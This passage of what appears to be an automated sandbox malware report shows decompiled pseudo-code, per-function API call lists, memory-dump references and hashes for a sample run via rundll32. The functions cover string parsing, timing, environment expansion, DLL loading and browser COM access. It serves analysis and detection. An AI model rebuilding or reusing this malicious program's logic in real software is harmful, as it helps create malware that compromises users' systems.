					} while (_t14 != 0);
					_t6 =  &_a8; // 0xe5405e
					 *( *_t6) = _t17;
				}
				return 0;
			}











                                                          0x00e538de
                                                          0x00e538eb
                                                          0x00e538ed
                                                          0x00e538ee
                                                          0x00e538f6
                                                          0x00e538f6
                                                          0x00e538fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00e538f1
                                                          0x00e538f2
                                                          0x00e538f5
                                                          0x00e538f5
                                                          0x00e53902
                                                          0x00e53909
                                                          0x00e5390c
                                                          0x00e53914
                                                          0x00e5391a
                                                          0x00e5391c
                                                          0x00e5391f
                                                          0x00e53923
                                                          0x00e53925
                                                          0x00e53928
                                                          0x00e53928
                                                          0x00e53929
                                                          0x00e5392b
                                                          0x00e53928
                                                          0x00e53935
                                                          0x00e53938
                                                          0x00e5393b
                                                          0x00e5393e
                                                          0x00e5393e
                                                          0x00e53942
                                                          0x00e53945
                                                          0x00e53945
                                                          0x00e53951

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,051B962C,?,?,00E5405E,?,051B962C,?,?,00E54540), ref: 00E538F6
                                                          • StrTrimA.SHLWAPI(?,00E592A4,00000002,?,00E5405E,?,051B962C,?,?,00E54540,?,?,?,?,?,00E568F7), ref: 00E53914
                                                          • StrChrA.SHLWAPI(?,00000020,?,00E5405E,?,051B962C,?,?,00E54540,?,?,?,?,?,00E568F7), ref: 00E5391F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID: ^@
                                                          • API String ID: 3043112668-2921739345
                                                          • Opcode ID: e715b861280e3d136497d8e974b90d5a3de9a2725aede53beb8bbddd7b320a8f
                                                          • Instruction ID: f3dfe469b2d643aacaffa1fc8aa58d9040d29b5815005f40a1409dc12501433a
                                                          • Opcode Fuzzy Hash: e715b861280e3d136497d8e974b90d5a3de9a2725aede53beb8bbddd7b320a8f
                                                          • Instruction Fuzzy Hash: 1101B1B23003456FE7204A3ACC45FA77B9CEBC9796F042821BD45EB286D6B0CD068660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E56A9F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 44%
                                                          			E00E56A9F() {
				char _v8;
				union _LARGE_INTEGER _v12;
				intOrPtr _v16;
				union _LARGE_INTEGER _v20;
				int _t10;

				QueryPerformanceFrequency( &_v12);
				_t10 = QueryPerformanceCounter( &_v20);
				_t3 =  &_v8; // 0xe5494f
				_push( *_t3);
				_push(_v12.LowPart);
				_push(_v16);
				_push(_v20.LowPart);
				L00E57DD6();
				return _t10;
			}








                                                          0x00e56aa9
                                                          0x00e56ab3
                                                          0x00e56ab9
                                                          0x00e56ab9
                                                          0x00e56abc
                                                          0x00e56abf
                                                          0x00e56ac2
                                                          0x00e56ac5
                                                          0x00e56acb

                                                          APIs
                                                          • QueryPerformanceFrequency.KERNEL32(00000000,?,?,00000000,00E5494F), ref: 00E56AA9
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,00000000,00E5494F), ref: 00E56AB3
                                                          • _aulldiv.NTDLL(00000000,?,?,OI), ref: 00E56AC5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterFrequency_aulldiv
                                                          • String ID: OI
                                                          • API String ID: 1936536342-2393818601
                                                          • Opcode ID: cfe5576d79c230f8ff12015ced654f0a06bb1d799729b32e270bc5b7b6d7c6a3
                                                          • Instruction ID: e8d78367863fdd13efe2322d112f91f822e72eff868e98d1b288bd25fd65829e
                                                          • Opcode Fuzzy Hash: cfe5576d79c230f8ff12015ced654f0a06bb1d799729b32e270bc5b7b6d7c6a3
                                                          • Instruction Fuzzy Hash: 5DD0423680020DFBCF01ABE5DD09CDEBB7ABB08205B400990A611A2061D63696689B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055745E6, Relevance: 6.3, APIs: 5, Instructions: 92memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05574670
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05574681
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05574699
                                                          • CloseHandle.KERNEL32(?), ref: 055746B3
                                                          • HeapFree.KERNEL32(00000000,?), ref: 055746C8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap$CloseHandle
                                                          • String ID:
                                                          • API String ID: 1910495013-0
                                                          • Opcode ID: a05b1147f87fa3756ad2e9bfc6fdcaeca6a75b6e590cad2dd687100489a21508
                                                          • Instruction ID: 33f292c28ce593d5a87e3078313dd44896bff0e4190c9a67b17752614cedf4dd
                                                          • Opcode Fuzzy Hash: a05b1147f87fa3756ad2e9bfc6fdcaeca6a75b6e590cad2dd687100489a21508
                                                          • Instruction Fuzzy Hash: 5831463020952AEFCB21AF66E988C2EFBAAFF48B103554405F016D7650CB35FCA1DB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05572B2C, Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?), ref: 05572B50
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • wsprintfA.USER32 ref: 05572B81
                                                            • Part of subcall function 05585FBD: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,05572BA1), ref: 05585FD3
                                                            • Part of subcall function 05585FBD: wsprintfA.USER32 ref: 05585FFB
                                                            • Part of subcall function 05585FBD: lstrlen.KERNEL32(?), ref: 0558600A
                                                            • Part of subcall function 05585FBD: wsprintfA.USER32 ref: 0558604A
                                                            • Part of subcall function 05585FBD: wsprintfA.USER32 ref: 0558607F
                                                            • Part of subcall function 05585FBD: memcpy.NTDLL(00000000,?,?), ref: 0558608C
                                                            • Part of subcall function 05585FBD: memcpy.NTDLL(00000008,055963D8,00000002,00000000,?,?), ref: 055860A1
                                                            • Part of subcall function 05585FBD: wsprintfA.USER32 ref: 055860C4
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?), ref: 05572BF6
                                                            • Part of subcall function 05593F16: RtlEnterCriticalSection.NTDLL(059BB148), ref: 05593F2C
                                                            • Part of subcall function 05593F16: RtlLeaveCriticalSection.NTDLL(059BB148), ref: 05593F47
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 05572BE0
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05572BEC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                                          • String ID:
                                                          • API String ID: 3553201432-0
                                                          • Opcode ID: f36cbef103293f0cbe1a813254b6c927ee8bdf3b7263ee9fbed76be87e30cfb3
                                                          • Instruction ID: 2b4e610a10d4c11aff5da9fa134bbfc21e59a1c2fa58d2c127aa50c1bc26cd3b
                                                          • Opcode Fuzzy Hash: f36cbef103293f0cbe1a813254b6c927ee8bdf3b7263ee9fbed76be87e30cfb3
                                                          • Instruction Fuzzy Hash: 292125B690014AEBCF11DF95ED89C9F7FB9FB88310B010416F905A6110E7799A24EB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558EEB3, Relevance: 6.2, APIs: 4, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0558B466: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 0558B481
                                                            • Part of subcall function 0558B466: LoadLibraryA.KERNEL32(00000000), ref: 0558B4CF
                                                            • Part of subcall function 0558B466: GetProcAddress.KERNEL32(00000000,?), ref: 0558B4E8
                                                            • Part of subcall function 0558B466: RegCloseKey.ADVAPI32(?), ref: 0558B539
                                                          • GetLastError.KERNEL32 ref: 0558F041
                                                          • FreeLibrary.KERNEL32(?), ref: 0558F0A9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                                          • String ID:
                                                          • API String ID: 1730969706-0
                                                          • Opcode ID: 0d11455230961b445a60a19382805b82fcb72417bbfc95df08661c2fc9a5a428
                                                          • Instruction ID: 5e4eae41f50e1bfa944d0574a17aeb188f86bce73cb2b7c5d695b4807548e060
                                                          • Opcode Fuzzy Hash: 0d11455230961b445a60a19382805b82fcb72417bbfc95df08661c2fc9a5a428
                                                          • Instruction Fuzzy Hash: EF71D6B5E0020AEFCF10EFE5C8849AEBBBAFF48305B108469E516B7250D735A945CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055786F3, Relevance: 6.2, APIs: 4, Instructions: 156threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05586403: lstrlen.KERNEL32(0559B072,059BB184,0559B072,00000000,05591D0C), ref: 0558640C
                                                            • Part of subcall function 05586403: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0558642F
                                                            • Part of subcall function 05586403: memset.NTDLL ref: 0558643E
                                                            • Part of subcall function 0557D01E: StrChrA.SHLWAPI(00000000,05572A10,7748D3B0,059BB17C,00000000,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D043
                                                            • Part of subcall function 0557D01E: StrTrimA.SHLWAPI(00000000,0559847C,00000000,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D062
                                                            • Part of subcall function 0557D01E: StrChrA.SHLWAPI(00000000,05572A10,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D06E
                                                          • GetCurrentThreadId.KERNEL32 ref: 0557878B
                                                          • GetCurrentThread.KERNEL32 ref: 0557879E
                                                          • GetModuleHandleA.KERNEL32(00000000,055963D4,00000000,00000000,?,00000000,?,00000000,00000000,?), ref: 05578825
                                                          • GetShellWindow.USER32 ref: 0557882C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$HandleModuleShellTrimWindowlstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 1517849391-0
                                                          • Opcode ID: 55032be0dcfd2109ad9b1e46075bba9fb2fd45aace2d0183e4d7cd1de960720a
                                                          • Instruction ID: 83ca1b397b786f52fe003878f69221eeb96bce905f55777c56d691aaa7ebb5e2
                                                          • Opcode Fuzzy Hash: 55032be0dcfd2109ad9b1e46075bba9fb2fd45aace2d0183e4d7cd1de960720a
                                                          • Instruction Fuzzy Hash: 4D51907161830AAFD710EF65E88896BB7E9FB84314F014D2EF585A7250DB70E948CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E52A24, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 152stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E00E52A24(void* __eflags, void* _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				char* _v24;
				intOrPtr _v28;
				void* _v40;
				char _v44;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				void _v88;
				char _v92;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				int _t48;
				intOrPtr _t53;
				void* _t55;
				void* _t67;
				void* _t76;
				WCHAR* _t80;
				intOrPtr _t82;

				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t42 =  *0xe5a2cc; // 0x51b9cd0
				_t5 = _t42 + 0x48; // 0x51b9e7b
				_t82 =  *_t5;
				_t6 = _t42 + 0x4c; // 0x51b9e84
				_v16 =  *_t6;
				_t44 =  *0xe5a2d4; // 0x435d5a8
				_t8 = _t44 + 0xe5bdd0; // 0x410025
				_t80 = E00E5121E(_t8);
				_v20 = _t80;
				if(_t80 == 0) {
					_t76 = 8;
					L24:
					return _t76;
				}
				_t48 = lstrlenW(_t80);
				_t10 =  &_a4; // 0xe5456a
				if(StrCmpNIW(_t80,  *_t10, _t48) != 0) {
					_t76 = 1;
					L22:
					E00E513CC(_v20);
					goto L24;
				}
				if(E00E5249F(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t53 = E00E53FC1(_t52,  *0xe5a38c);
				_v12 = _t53;
				if(_t53 == 0) {
					_t76 = 8;
					goto L19;
				} else {
					_t55 = E00E53FC1(_t53, _t82);
					_t84 = _t55;
					if(_t55 == 0) {
						_t76 = 8;
					} else {
						_t76 = E00E53B91(_a4, 0x80000001, _v12, _t84,  &_v92,  &_v88);
						_t55 = E00E513CC(_t84);
					}
					if(_t76 != 0) {
						L17:
						E00E513CC(_v12);
						L19:
						_t83 = _a4;
						if(_a4 != 0) {
							E00E5243E(_t83);
						}
						goto L22;
					} else {
						if(( *0xe5a2b8 & 0x00000001) == 0) {
							L14:
							E00E576A8(_v88, _v92, _v92,  *0xe5a2c8, 0);
							_t76 = E00E55CD8(_v92,  &_v84,  &_v80, 0);
							if(_t76 == 0) {
								_v28 = _a4;
								_v24 =  &_v92;
								_t76 = E00E54BAC( &_v44, 0);
							}
							E00E513CC(_v92);
							goto L17;
						}
						_t67 = E00E53FC1(_t55, _v16);
						_t86 = _t67;
						if(_t67 == 0) {
							_t76 = 8;
						} else {
							_t76 = E00E53B91(_a4, 0x80000001, _v12, _t86,  &_v76,  &_v72);
							E00E513CC(_t86);
						}
						if(_t76 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}


























                                                          0x00e52a36
                                                          0x00e52a39
                                                          0x00e52a40
                                                          0x00e52a46
                                                          0x00e52a47
                                                          0x00e52a48
                                                          0x00e52a49
                                                          0x00e52a4a
                                                          0x00e52a4b
                                                          0x00e52a50
                                                          0x00e52a50
                                                          0x00e52a53
                                                          0x00e52a56
                                                          0x00e52a59
                                                          0x00e52a61
                                                          0x00e52a6d
                                                          0x00e52a71
                                                          0x00e52a74
                                                          0x00e52ba9
                                                          0x00e52bac
                                                          0x00e52bb0
                                                          0x00e52bb0
                                                          0x00e52a7b
                                                          0x00e52a82
                                                          0x00e52a8e
                                                          0x00e52b9c
                                                          0x00e52b9d
                                                          0x00e52ba0
                                                          0x00000000
                                                          0x00e52ba0
                                                          0x00e52aa0
                                                          0x00e52aa2
                                                          0x00e52aa2
                                                          0x00e52aab
                                                          0x00e52ab2
                                                          0x00e52ab5
                                                          0x00e52b8b
                                                          0x00000000
                                                          0x00e52abb
                                                          0x00e52abc
                                                          0x00e52ac1
                                                          0x00e52aca
                                                          0x00e52aed
                                                          0x00e52acc
                                                          0x00e52ae2
                                                          0x00e52ae4
                                                          0x00e52ae4
                                                          0x00e52af0
                                                          0x00e52b7f
                                                          0x00e52b82
                                                          0x00e52b8c
                                                          0x00e52b8c
                                                          0x00e52b91
                                                          0x00e52b93
                                                          0x00e52b93
                                                          0x00000000
                                                          0x00e52af6
                                                          0x00e52afd
                                                          0x00e52b33
                                                          0x00e52b43
                                                          0x00e52b59
                                                          0x00e52b5d
                                                          0x00e52b62
                                                          0x00e52b68
                                                          0x00e52b75
                                                          0x00e52b75
                                                          0x00e52b7a
                                                          0x00000000
                                                          0x00e52b7a
                                                          0x00e52b02
                                                          0x00e52b07
                                                          0x00e52b0b
                                                          0x00e52b2e
                                                          0x00e52b0d
                                                          0x00e52b23
                                                          0x00e52b25
                                                          0x00e52b25
                                                          0x00e52b31
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e52b31
                                                          0x00e52af0

                                                          APIs
                                                          • memset.NTDLL ref: 00E52A39
                                                            • Part of subcall function 00E5121E: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,051B9E7B,00000000,00E52A6D,00410025,00000001,00000000,74ECC740), ref: 00E5122F
                                                            • Part of subcall function 00E5121E: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00E5124C
                                                          • lstrlenW.KERNEL32(00000000,00410025,00000001,00000000,74ECC740), ref: 00E52A7B
                                                          • StrCmpNIW.SHLWAPI(00000000,jE,00000000), ref: 00E52A86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                          • String ID: jE
                                                          • API String ID: 3817122888-3445217829
                                                          • Opcode ID: 3dfa2e89e3a0fb576008b0e12f1f7e8ba2c358b2bb498237dc10372b12baaf13
                                                          • Instruction ID: 8df5fb3d4539d9d3464c3bc52a80bec14c0a942b193c61be47bbd624e8c9d2e6
                                                          • Opcode Fuzzy Hash: 3dfa2e89e3a0fb576008b0e12f1f7e8ba2c358b2bb498237dc10372b12baaf13
                                                          • Instruction Fuzzy Hash: 50417C76900208AFDB11AFE5CC85EEE7BB8AF09356F145829FE00B7121D6719D4C87A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E54598, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 46%
                                                          			E00E54598(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xe5a2d4; // 0x435d5a8
					_t5 = _t102 + 0xe5b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xe592b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xe5a2d4; // 0x435d5a8
												_t28 = _t108 + 0xe5b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xe5a2d4; // 0x435d5a8
														_t33 = _t78 + 0xe5b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                                          0x00e5459d
                                                          0x00e545a6
                                                          0x00e545a7
                                                          0x00e545ab
                                                          0x00e545b1
                                                          0x00e545b7
                                                          0x00e545c0
                                                          0x00e545c6
                                                          0x00e545d0
                                                          0x00e545d2
                                                          0x00e545d8
                                                          0x00e545dd
                                                          0x00e545e8
                                                          0x00e545f0
                                                          0x00e545f3
                                                          0x00e54716
                                                          0x00e545f9
                                                          0x00e545f9
                                                          0x00e54606
                                                          0x00e5460c
                                                          0x00e54612
                                                          0x00e54616
                                                          0x00e5461c
                                                          0x00e54629
                                                          0x00e5462d
                                                          0x00e54633
                                                          0x00e54636
                                                          0x00e5463c
                                                          0x00e54642
                                                          0x00e54648
                                                          0x00e5464b
                                                          0x00e5464e
                                                          0x00e54654
                                                          0x00e5465d
                                                          0x00e54663
                                                          0x00e54664
                                                          0x00e54667
                                                          0x00e54668
                                                          0x00e54669
                                                          0x00e54671
                                                          0x00e54672
                                                          0x00e54673
                                                          0x00e54675
                                                          0x00e54679
                                                          0x00e5467d
                                                          0x00000000
                                                          0x00000000
                                                          0x00e54683
                                                          0x00e5468c
                                                          0x00e54692
                                                          0x00e5469c
                                                          0x00e546a0
                                                          0x00e546a2
                                                          0x00e546af
                                                          0x00e546b3
                                                          0x00e546bb
                                                          0x00e546c0
                                                          0x00e546d2
                                                          0x00e546d4
                                                          0x00e546da
                                                          0x00e546da
                                                          0x00e546e3
                                                          0x00e546e3
                                                          0x00e546e5
                                                          0x00e546eb
                                                          0x00e546eb
                                                          0x00e546ee
                                                          0x00e546f4
                                                          0x00e546f7
                                                          0x00e54700
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e54700
                                                          0x00e54654
                                                          0x00e5464e
                                                          0x00e54636
                                                          0x00e54706
                                                          0x00e54706
                                                          0x00e5470c
                                                          0x00e5470c
                                                          0x00e54712
                                                          0x00e54712
                                                          0x00e5471b
                                                          0x00e54721
                                                          0x00e54721
                                                          0x00e545dd
                                                          0x00e5472a

                                                          APIs
                                                          • SysAllocString.OLEAUT32(00E592B0), ref: 00E545E8
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00E546CA
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E546E3
                                                          • SysFreeString.OLEAUT32(?), ref: 00E54712
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: 1401dcd38f7860bd59c0a40b3550e71816f6c4aed94b5c7651b3e36a847bea09
                                                          • Instruction ID: 4667db405993592395f591eb95a3433d677d0129242f3adba012fe3bbfd6e638
                                                          • Opcode Fuzzy Hash: 1401dcd38f7860bd59c0a40b3550e71816f6c4aed94b5c7651b3e36a847bea09
                                                          • Instruction Fuzzy Hash: 2F518EB5D00209EFCB00DFA8C8888AEB7B9FF89309B144995E915FB260D7719D45CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557A60F, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 0557A6C2
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0557A6D8
                                                          • memset.NTDLL ref: 0557A781
                                                          • memset.NTDLL ref: 0557A797
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: b5667167ed9c916d11d46b6c96adf0d7a495849dc50caa9ab543a56c738a0f6a
                                                          • Instruction ID: 91e6cf7ee0264f48b24b0905ad28b7d2ff5e1b0c613fb8ce26d69f1c1b860f92
                                                          • Opcode Fuzzy Hash: b5667167ed9c916d11d46b6c96adf0d7a495849dc50caa9ab543a56c738a0f6a
                                                          • Instruction Fuzzy Hash: 83416031B0021AABDB10AF68DC44BEE7779FF85710F104569F919A7280EB70AE558B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E5472B, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E00E5472B(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00E570EC(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00E53954(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00E56136(_t101,  &_v428, _a8, _t96 - _t81);
					E00E56136(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00E53954(_t101,  &E00E5A188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00E53954(_a16, _a4);
						E00E52E9B(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
